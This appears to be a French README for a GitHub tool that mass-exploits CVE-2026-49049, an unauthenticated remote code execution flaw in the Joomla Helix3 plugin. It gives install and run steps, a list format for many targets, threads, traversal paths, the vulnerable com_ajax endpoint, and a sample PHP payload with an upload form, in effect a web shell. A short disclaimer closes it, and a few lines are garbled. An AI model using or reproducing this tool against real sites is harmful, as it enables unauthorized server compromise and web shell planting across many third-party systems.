
Scanner de vulnérabilités de masse pour CVE-2026-49049 – Exécution de code à distance non authentifiée dans le plugin Joomla Helix3. Multi-threadé, détecte à la fois les charges utiles PHP exécutées et brutes.
Scanner de vulnérabilités de masse pour CVE-2026-49049 - Exécution de code à distance non authentifiée dans le framework Helix3 de Joomla.
Cet outil vérifie plusieurs sites Joomla pour la vulnérabilité CVE-2026-49049 trouvée dans le plugin Helix3. Cette vulnérabilité permet à un attaquant non authentifié de téléverser et d'exécuter du code PHP arbitraire sur le serveur cible.
Le scanner tente de :
com_ajax avec le plugin helix3.requestspip install requests
🛠 Installation
git clone https://github.com/Jenderal92/CVE-2026-49049.git
cd CVE-2026-49049
chmod +x cve-2026-49049.py
🚀 Utilisation
python2 cve-2026-49049.py targets.txt
Format d'entrée
Chaque ligne de targets.txt doit contenir un domaine ou une IP :
example.com
https://example.com
http://192.168.1.100
Fichiers de sortie
Fichier Description results.txt URLs vulnérables où le payload a été exécuté rez.txt URLs où le payload a été téléversé mais pas exécuté (PHP brut)
Exemple de sortie
============================================================
CVE-2026-49049 Mass Scanner
Results: results.txt (executed)
Raw PHP: rez.txt (not executed)
============================================================
[*] Loaded 150 targets
[*] Using 20 threads
[+] VULNERABLE: https://target.com
[*] RAW PHP: https://target2.com
[-] NOT VULNERABLE: https://secure.com
============================================================
[+] Selesai!
[+] Vulnerable: 12
[+] Raw PHP: 5
[+] Vulnerable URLs:
https://target.com/tmp_123456.php.json
⚙️ Configuration
Vous pouvez ajuster les variables suivantes dans le script :
Variable Défaut Description THREADS 20 Nombre de threads simultanés PATHS ['../../../', '../../../../'] Chemins de traversée de répertoire TIMEOUT 5 Délai d'expiration des requêtes HTTP RESULT_FILE 'results.txt' Fichier de sortie pour les sites vulnérables RAW_RESULT_FILE 'rez.txt' Fichier de sortie pour les sites PHP bruts
🧠 Comment ça marche
Le script envoie une requête POST à :
/index.php?option=com_ajax&plugin=helix3&format=json
avec un payload qui :
Ensuite, il vérifie si le fichier est accessible et si le code PHP est exécuté ou simplement affiché en texte brut.
Exemple de payload
<?php
$s = "Shinday";
echo '<center><pre><br><br><h1 style="color:red;">'.$s.'</h1><br>'.php_uname()."\n".'<br><br><br>';
// ... upload form
?>
⚠️ Avertissement
Cet outil est destiné uniquement à des fins éducatives et de tests autorisés.
L'utilisation non autorisée de cet outil contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas explicitement obtenu la permission de tester est illégale. L'auteur n'est pas responsable de tout usage abusif ou dommage causé par cet outil.
Pour plus d'avertissements, vous pouvez consulter l'avertissement sur la page de Jenderal92. Vous pouvez le vérifier ICI !!!